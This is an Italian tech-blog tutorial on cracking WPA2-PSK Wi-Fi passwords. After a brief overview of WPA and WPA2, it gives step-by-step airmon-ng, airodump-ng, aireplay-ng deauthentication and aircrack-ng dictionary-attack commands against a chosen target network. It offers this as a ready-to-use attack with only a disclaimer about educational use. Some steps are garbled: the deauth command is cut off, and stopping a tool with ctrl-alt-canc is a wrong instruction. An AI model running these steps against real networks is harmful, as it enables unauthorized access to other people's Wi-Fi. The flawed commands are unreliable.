
Tecniche per craccare una rete WPA2
Cari lettori di Tecnogalaxy, oggi vi parlerò della tecnica su come cercare di craccare una rete con protezione WPA2, utilizzando un dizioniario e i seguenti tool: aircrack, airodump e aireplay. Ci sono molte cose da dire quindi iniziamo subito e andiamo a vedere come craccare una rete WPA2.
Craccare una rete WPA2
WPA e WPA2, molto simili ma differenti tra loro. Sono il risultato riuscito del tentativo di colmare le lacune del progenitore WEP.
La WPA è stata rilasciata dalla “Wi-Fi Alliance” nella fretta di rendere sicura una rete wireless nel più breve tempo possibile, l’802.11i o WPA2 è da intendersi ad oggi come standard ufficiale.
Le modalità di autentificazione degli host, WPA e WPA2 sono due:
- la prima, enterprise, mediante server di autenticazione RADIUS (WPA-RADIUS e WPA2/RADIUS o semplicemente WPA e WPA2 rispettivamente), che rilascia differenti chiavi agli utenti;
- la seconda, personal, tramite una chiave unica e segreta condivisa, chiamata pre-shared key (PSK, da cui WPA/PSK e WPA2/PSK rispettivamente).
La modalità di gran lunga più adatta per ambienti di small office e casalinghi come suggerito dallo stesso nome.
WPA
Utilizza TKIP (Temporal Key Integrity Protocol), protocollo crittografico che a sua volta utilizza RC4, analogamente al WEP, ma con chiavi a 128 bit ed un vettore di inizializzazione (IV) a 48 bit.
L’aspetto più importante, è che oltre a cambiare la chiave di cifratura di ogni pacchetto, TKIP contiene un meccanismo che varia in continuazione la chiave segreta condivisa ad ogni nuova associazione host-access point.
Condividere la chiave PSK con altri host ed utilizzare sempre la stessa, costituiva un grosso problema per la tecnologia WEP (non che essa avesse particolari punti d’eccellenza).
WPA2
Introduce il protocollo CCMP, con la sostanziale differenza di utilizzare AES anziché RC4 come algoritmo interno di cifratura.
WPA e WPA2 non presentano alcuna vulnerabilità logica nota nella loro implementazione.
Per fare il nostro test dobbiamo avere una scheda di wireless che supporti il monitor mode e l’iniezione di pacchetti (io utilizzo il modello ALFA AWUS036NH di Rete Ralink) se non abbiamo una scheda con queste caratteristiche non potremo portare a termine il test.
Basta chiacchere però, passiamo al divertimento, utilizzando sempre il nostro caro amico Kali Linux!
Apriamo un terminale e scriviamo il seguente comando e confermiamo con l’invio:
ifconfig (per verificare per verificare la scheda)
Copiamoci il nostro indirizzo ip.
Apriamo una nuova shell e scriviamo il comando:
airmon-ng
ifconfig (per verificare per verificare la scheda)
Adesso scriviamo i seguenti comandi e confermiamo con l’invio:
ifconfig wlan1 down
airmon-ng start wlan1
Perfetto, la nostra scheda wireless è in modalità monitor mode.
Adesso facciamo la scansione delle reti per vedere cosa abbiamo nei dintorni, utilizzando il tool airodump.
Perfetto scansione partita, il tool mostrerà tutte le reti wireless presenti nei dintorni.
Scelto il nostro target, stoppiamo il tool con i pulsanti ctr -alt – canc, copiamoci i seguenti parametri:
- BSSID
- CH (canale)
- ESSID (nome della rete)
Apriamo una nuova shell e scriviamo il comando:
airodump-ng --bssid 11:22:33:44:55:66 (BSSID della rete scelta) --channel 2 (il canale della rete da attaccare) --write /root/Scrivania/handshake (dove verrà salvato il file) wlan1mon
Vediamo il tool in esecuzione, dobbiamo attendere però di catturare l’handshake, per velocizzare il processo dobbiamo far disconnettere i client collegati, ci viene incontro per fortuna il tool aireplay.
Apriamo una nuova shell e scriviamo il comando:
aireplay-ng --deauth 3000 -a 11:22:33:44:55:66 (il BSSID della rete da attaccare) -c
Di solito lascio le due finestre sovrapposte così da vedere quando l’handshake viene catturata.
Ok adesso apriamo una nuova shell e cerchiamo di craccare la password della rete wireless
aircrack-ng /root/Scrivania/handshake-01.cap (il nome del file salvato contenente l’handshake catturata) -w /root/Scrivania/rockyou.txt (dizionario contenente le password più comuni)
Al prossimo articolo!
N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.
Giorgio Perego
IT Manager
Leggi anche:
- Come Navigare Sicuri
- I vantaggi in termini di sicurezza derivanti dall’utilizzo delle VDR nelle transazioni immobiliari
- Cos’è il cashback: caratteristiche, utilità, settori
- Wire ha appena ricevuto un finanziamento di 30 milioni
- Woolsocks: Regali di Natale GRATIS
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI